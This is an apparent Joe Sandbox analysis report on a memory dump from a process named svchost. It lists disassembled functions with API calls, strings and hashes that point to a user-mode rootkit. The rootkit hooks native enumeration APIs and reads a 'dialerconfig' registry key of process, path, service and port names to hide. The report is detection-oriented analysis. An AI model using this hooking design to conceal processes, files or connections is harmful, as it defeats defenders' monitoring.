Part of subcall function 0000026E027C12C8: HeapAlloc.KERNEL32 ref: 0000026E027C1345
Part of subcall function 0000026E027C12C8: RegEnumValueW.ADVAPI32 ref: 0000026E027C13A1
Part of subcall function 0000026E027C12C8: GetProcessHeap.KERNEL32 ref: 0000026E027C13E9
Part of subcall function 0000026E027C12C8: HeapAlloc.KERNEL32 ref: 0000026E027C13F7
Part of subcall function 0000026E027C12C8: GetProcessHeap.KERNEL32 ref: 0000026E027C141B
Part of subcall function 0000026E027C12C8: HeapFree.KERNEL32 ref: 0000026E027C1429
Part of subcall function 0000026E027C12C8: lstrlenW.KERNEL32 ref: 0000026E027C1432
Part of subcall function 0000026E027C12C8: GetProcessHeap.KERNEL32 ref: 0000026E027C1440
Part of subcall function 0000026E027C12C8: HeapAlloc.KERNEL32 ref: 0000026E027C144E

Strings

pid, xrefs: 0000026E027C173A
process_names, xrefs: 0000026E027C1775
tcp_remote, xrefs: 0000026E027C1861
service_names, xrefs: 0000026E027C17EB
startup, xrefs: 0000026E027C16FD
SOFTWARE\dialerconfig, xrefs: 0000026E027C16BA
paths, xrefs: 0000026E027C17B0
udp, xrefs: 0000026E027C189C
tcp_local, xrefs: 0000026E027C1826

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 667fb6dfba2cfd8cd924a51e86ca10e603a25f9860a749a460c8690d6d777377
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: E6715E3A710A408AEF109F31E8D86A923F5F784B88F8A5125DE8D777A9DF76C444C740

Function 0000026E027C12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026E027C1326
GetProcessHeap.KERNEL32 ref: 0000026E027C1334
HeapAlloc.KERNEL32 ref: 0000026E027C1345
RegEnumValueW.ADVAPI32 ref: 0000026E027C13A1

Part of subcall function 0000026E027C1554: StrCmpIW.SHLWAPI ref: 0000026E027C1585

GetProcessHeap.KERNEL32 ref: 0000026E027C13E9
HeapAlloc.KERNEL32 ref: 0000026E027C13F7
GetProcessHeap.KERNEL32 ref: 0000026E027C141B
HeapFree.KERNEL32 ref: 0000026E027C1429
lstrlenW.KERNEL32 ref: 0000026E027C1432
GetProcessHeap.KERNEL32 ref: 0000026E027C1440
HeapAlloc.KERNEL32 ref: 0000026E027C144E
StrCpyW.SHLWAPI ref: 0000026E027C1470
GetProcessHeap.KERNEL32 ref: 0000026E027C1485
HeapFree.KERNEL32 ref: 0000026E027C1493

Strings

d, xrefs: 0000026E027C1365

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: f6fc0338f33ff453b23c0b1b2b7a4f517ed195f7a8d15abd7ae33221e504b31a
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 8E51A376204B45DBEB14CF62E58836A73F1F788B80F498128DB8917B94DF7AC555CB40

Function 0000026E027C1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000026E027C1EBF

Part of subcall function 0000026E027C2174: GetModuleHandleA.KERNEL32 ref: 0000026E027C218C
Part of subcall function 0000026E027C2174: GetProcAddress.KERNEL32 ref: 0000026E027C219D

Part of subcall function 0000026E027C5C10: GetCurrentThreadId.KERNEL32 ref: 0000026E027C5C4B

Strings

NtResumeThread, xrefs: 0000026E027C1F02
NtEnumerateValueKey, xrefs: 0000026E027C1F76
NtEnumerateKey, xrefs: 0000026E027C1F59
advapi32.dll, xrefs: 0000026E027C1F97, 0000026E027C1FB8
NtQueryDirectoryFileEx, xrefs: 0000026E027C1F3C
ntdll.dll, xrefs: 0000026E027C1ECD
NtQueryDirectoryFile, xrefs: 0000026E027C1F1F
NtQuerySystemInformation, xrefs: 0000026E027C1EE5
sechost.dll, xrefs: 0000026E027C1FD9
EnumServicesStatusExW, xrefs: 0000026E027C1FB1, 0000026E027C1FD2
EnumServiceGroupW, xrefs: 0000026E027C1F90
NtDeviceIoControlFile, xrefs: 0000026E027C1FF6

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: f21e957f07e3b5d0a9e822f09b4748c8075eff71f8e8683ae0445e7519565883
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 9631C67C101A0AAAEF05EF65E8C96F423B0B784744F9F59179849362E2DEFA8649C340

Function 0000026E027C23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000026E027C2405
GetCurrentProcessId.KERNEL32 ref: 0000026E027C240F

Part of subcall function 0000026E027C19AC: OpenProcess.KERNEL32 ref: 0000026E027C19CA
Part of subcall function 0000026E027C19AC: IsWow64Process.KERNEL32 ref: 0000026E027C19E0
Part of subcall function 0000026E027C19AC: CloseHandle.KERNEL32 ref: 0000026E027C19FB

CreateFileW.KERNEL32 ref: 0000026E027C2468
WriteFile.KERNEL32 ref: 0000026E027C2490
ReadFile.KERNEL32 ref: 0000026E027C24AF
CloseHandle.KERNEL32 ref: 0000026E027C24B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 0000026E027C2438
\\.\pipe\dialerchildproc32, xrefs: 0000026E027C243F

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 12a132d4fdf2fec3cc04cc285bc29dc8d679e7a300a296416f393a2a8630c39b
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: AA214139614B4087FB108B25F48876973F1F389BA4F994215DA9912BE8DF7DC549CF01

Function 0000026E027C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026E027C10AB
RegEnumValueW.ADVAPI32 ref: 0000026E027C110E
GetProcessHeap.KERNEL32 ref: 0000026E027C1155
HeapAlloc.KERNEL32 ref: 0000026E027C1163
GetProcessHeap.KERNEL32 ref: 0000026E027C1187
HeapFree.KERNEL32 ref: 0000026E027C1195

Strings

d, xrefs: 0000026E027C10CE

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 8bdd6c1410eae6d65bc3a223debe646f93794550aa80f16201fd7abf952780ef
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 08418077614B80DBEB60CF61E4883AAB7E1F388B84F558129DB8917B94DF79C164CB00

Function 0000026E027C75F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026E027C7618
__scrt_acquire_startup_lock.LIBCMT ref: 0000026E027C766A
_RTC_Initialize.LIBCMT ref: 0000026E027C7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026E027C76BE
__scrt_release_startup_lock.LIBCMT ref: 0000026E027C76E9

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 243f975d5dbef8bdb6beb42359683e4f2cacf6e0117101ae6fae00b916c193ff
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 1F81C5397046458FFE58AB3998C9379A2E8A785780F2E406D9A44777D6DFFBC8418F00

Function 0000026E027969F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026E02796A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000026E02796A6A
_RTC_Initialize.LIBCMT ref: 0000026E02796A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026E02796ABE
__scrt_release_startup_lock.LIBCMT ref: 0000026E02796AE9

Memory Dump Source

Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 5a6b3f6c9317d8ed1f062b7480a15016e8184826821fd883873ab58d4ef18528
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 008113796143418EFE54AB2598CD37962E9E786780F5F4229BE08737D6DBFBC8818300

Function 0000026E027C9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 0000026E027C9889
GetLastError.KERNEL32 ref: 0000026E027C9897
LoadLibraryExW.KERNEL32 ref: 0000026E027C98C1
FreeLibrary.KERNEL32 ref: 0000026E027C9907
GetProcAddress.KERNEL32 ref: 0000026E027C9913

Strings

api-ms-, xrefs: 0000026E027C98A9

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 9a5f57febfe32590c4d523f0353beb136a2f5bcc58ed9dbadc77c8b2c739fb19
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 4B31E539202B40D9FF559B22A4887B923E4BB48BA0F6F0528DE6D273C0DFB9C0448700

Function 0000026E027D1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 0000026E027D1BCD
GetLastError.KERNEL32 ref: 0000026E027D1BD9
CloseHandle.KERNEL32 ref: 0000026E027D1BF1
CreateFileW.KERNEL32 ref: 0000026E027D1C1C
WriteConsoleW.KERNEL32 ref: 0000026E027D1C3B

Strings

CONOUT$, xrefs: 0000026E027D1BFD

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: c4fefdd5599984354cf0ff892720091c621894ad19e6b24c4482f2e3c28c786c
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: A7118F36714B408BEB508B56E89832976F0F788FE4F494224EA9D977D4DFBAC9048B40

Function 0000026E027C5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026E027C5C4B
GetThreadContext.KERNEL32 ref: 0000026E027C5DB5

Part of subcall function 0000026E027C5A40: GetCurrentThreadId.KERNEL32 ref: 0000026E027C5A44

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 366098d83052950f8ad60320867be25376ee9be932b08e9a9a28d3acc8a64091
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: EDD1AC7A208B8886DA70DB1AE4D436A77F0F3C8B84F554216EACD57BA5DF7AC541CB00

Function 0000026E027C30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026E027C30D7
HeapAlloc.KERNEL32 ref: 0000026E027C30EA
StrCmpNIW.SHLWAPI ref: 0000026E027C316B
GetProcessHeap.KERNEL32 ref: 0000026E027C31D1
HeapFree.KERNEL32 ref: 0000026E027C31DF

Strings

dialer, xrefs: 0000026E027C3164

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: fecb9f5eaf39740fc6ac11f0cd628fcdc31fde96270784dd0c1e22eaacfba607
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 3831B639701F518FEF11DF26A88867963E0FB44B84F1E80649E8827B94EF7AC4A18700

Function 0000026E027C1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000026E027C1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000026E027C1A58
PathFindFileNameW.SHLWAPI ref: 0000026E027C1A67
lstrlenW.KERNEL32 ref: 0000026E027C1A73
StrCpyW.SHLWAPI ref: 0000026E027C1A86
CloseHandle.KERNEL32 ref: 0000026E027C1A94

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: de1d74e92d318f10935076f78a65f087db6724f0bc4b6784d9e9dbc8ca0c77b5
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: B8016D35700A419BEB10DB22A89C36963E1F788FC0F9D4075CE8D53794DE7EC9858740

Function 0000026E027C37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000026E027C37C8
GetCurrentProcess.KERNEL32 ref: 0000026E027C37D6
VirtualProtectEx.KERNEL32 ref: 0000026E027C37F8
GetCurrentProcess.KERNEL32 ref: 0000026E027C3819
VirtualProtectEx.KERNEL32 ref: 0000026E027C383A
TerminateThread.KERNEL32 ref: 0000026E027C3849

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 20c682b8bc8ce5698e21820d2a1f0a7e4cf0476fc68bd491d8929d24ba400b42
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 6B115B78602B418BFF219B21E89D72662F0BB48B81F194469CD8D2B7D4EF7EC0088B10

Function 0000026E027C90F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026E027C9103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026E027C9198
RtlUnwindEx.NTDLL ref: 0000026E027C91E7

Strings

f, xrefs: 0000026E027C9116
csm, xrefs: 0000026E027C917E

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 1f8fc5c10ebc940c0068b293068eddbcaff2a0151ba2ccd6a2e89f42b5f1c810
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 0C518F3A211610CFEF94CB25E48CB7937E5F344B98F6A81289B46677C8EBB6C841C700

Function 0000026E027C90D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026E027C9103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026E027C9198
RtlUnwindEx.NTDLL ref: 0000026E027C91E7

Strings

f, xrefs: 0000026E027C9116
csm, xrefs: 0000026E027C917E

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: d1cd6b8f10e07fdb81256b22d94097f273fe4a80ede9a7d9f01fa456c5eccfce
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: DE317039210650DBEB54DF21E88D73937E5F744B88F2A8118AF56177C5DBBAC941C704

Function 0000026E027C1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000026E027C1AD8
StrCmpNIW.SHLWAPI ref: 0000026E027C1AF2
lstrlenW.KERNEL32 ref: 0000026E027C1B01
StrCpyW.SHLWAPI ref: 0000026E027C1B16

Strings

\\?\, xrefs: 0000026E027C1AE6

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: e0d8711b5aae5929797bc1aef1c48c8cdfc6d6c786b88f0553d48020b897baba
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 37F044763046819BEF208F25F5D836967B1F744B88F898075CA8D56595DEAEC648CF00

Function 0000026E027C3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000026E027C3222
StrCpyW.SHLWAPI ref: 0000026E027C3232
StrCatW.SHLWAPI ref: 0000026E027C323E
PathCombineW.SHLWAPI ref: 0000026E027C324C

Strings

\\.\pipe\, xrefs: 0000026E027C3218

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: cb79dc33559b0f95bb60b0cde89e84ae2df944f9770e57cdc4cb0b3c573a2f82
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: AAF08938704BC097EE004B13B98813652B0B788FD0F0D8171DD9627B98DE6DC4418704

Function 0000026E027CA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000026E027CA154
GetProcAddress.KERNEL32 ref: 0000026E027CA16A
FreeLibrary.KERNEL32 ref: 0000026E027CA187

Strings

mscoree.dll, xrefs: 0000026E027CA14B
CorExitProcess, xrefs: 0000026E027CA163

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: f86b637eb32bfff765e459163f8dfbac5e671ae7377998e7d76cf580e9d6127c
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 2FF082797216449BEF444F60E8DC37527F0AB88B81F4E2019958B952E0CFB9C488CB11

Function 0000026E027C51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026E027C5236

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: d348b5d625e54793deef9836e859e1b86d142179e8831b4bd13031e39927742b
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 1102DD36119B808ADB60CB55F49436AB7E0F3C4794F654119EA8E57BA8DFBED444CB00

Function 0000026E027D0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000026E027D08A2
GetConsoleMode.KERNEL32 ref: 0000026E027D0960
GetLastError.KERNEL32 ref: 0000026E027D09EA

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 120a50f670a50f483da2c0c9ebf76d6ea500c309c481725890b1ba8b0a7d5c24
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 6881CE3AA106508EFF509B6198C93BD26F1F784B88F4E6116EE8A777D1DBB68441C710

Function 0000026E027C57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026E027C5806

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: d54defd45b00235f0a5b52e80c40345050d2ddf77d4baf772ee173c35ffecfc5
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 9961DC3A519B40CAEB608B25E48832AB7E0F3C8754F655119EACD67BE4CBBED440CF44

Function 0000026E027D1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000026E027D1EE0
_set_statfp.LIBCMT ref: 0000026E027D1EFB
_set_statfp.LIBCMT ref: 0000026E027D1F17
_set_statfp.LIBCMT ref: 0000026E027D1F53

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 5b378ba5170c2f9b41d1dfd193bd082308d38a3428fc6ad1d2b509724cedbea8
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 7611917EA59A000BFF981164E4DE37511E0AB66374F8F4634EAFE366D78BD68C424100

